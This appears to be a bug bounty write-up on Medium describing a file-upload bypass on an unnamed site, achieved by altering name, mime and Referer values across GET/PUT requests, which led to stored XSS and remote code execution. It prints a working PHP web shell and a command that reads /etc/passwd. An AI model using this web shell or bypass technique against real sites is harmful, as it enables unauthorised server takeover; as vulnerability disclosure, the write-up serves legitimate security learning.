How I found RCE But Got Duplicated

Image for post
Image for post

So first of All i can not show You the Name Of the Site Because Of security Issue But Let me tell You How Was I am able to bypass the file Upload functionality to Upload a shell to the website.

So first I tried Into The edit Profile screen I was trying to find An XSS Because XSS pays a lot , But sadly I can not Find any XSS in every Possible parameter So I Think That Lets upload A shell For that I was checking that The Image is Uploading on the same app or any third party app all other images on that website was on so when i uploaded the simple image on the profile it was on<ProfilID>/smilehacker.jpg

Image for post
Image for post

Now the next thing was to try uploading any other extension, but if i try uploading any extension other than JPG, PNG it popup a forbidden error. So its final that there are Restriction of other MIME types.

so I think that i need to try GET request containing the filename & mime, in it<id>/avatar?name=test.png&mime=image%2Fpng

and the response code of the request was 200 OK simple & The next request was PUT request for file upload to the images directory.<id>/testtts.png

I tried chaining the content of the PUT request as HTML or TXT but it respond with error code 500 [That sucks…] But later I realized that It was because i forget that the referer header contains the last URL . But then tested it again By changing the name & mime in First GET request as it was added as Referer to the next PUT request and then i changed the content & file type in the PUT request.

Image for post
Image for post

AND I GOT 200<id>/avatar?name=smile.html&mime=text%2Fhtml

and Following that request i made changes to the PUT request to Upload an HTML file and it was Success. Now I have a Stored XSS using HTML file, I bypassed the Same origin Policies & X-Frame-Options Header and more……

Now i decided to upload a PHP file With My Remote Code..

Image for post
Image for post

<?php if(isset($_REQUEST[‘cmd‘])){ echo “<pre>“; $cmd = ($_REQUEST[‘cmd‘]); system($cmd); echo “</pre>“; die; }?>

Its simple PHP Backdoor which i found from google TBH.. But when I uploaded PHP code It gave Me 403 status code (Feels Like WTF is Happening).

So I think that Lets try Some Other extentions (Was Think That’s The Last try after it I’ll Leave that). And when i Tried php5 , php7 It works As an Magic Target:<id>/try.phps?cmd=cat+/etc/passwd


They Fixed this Bug after a week But due to company Policy I can not Show u the Name .




Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store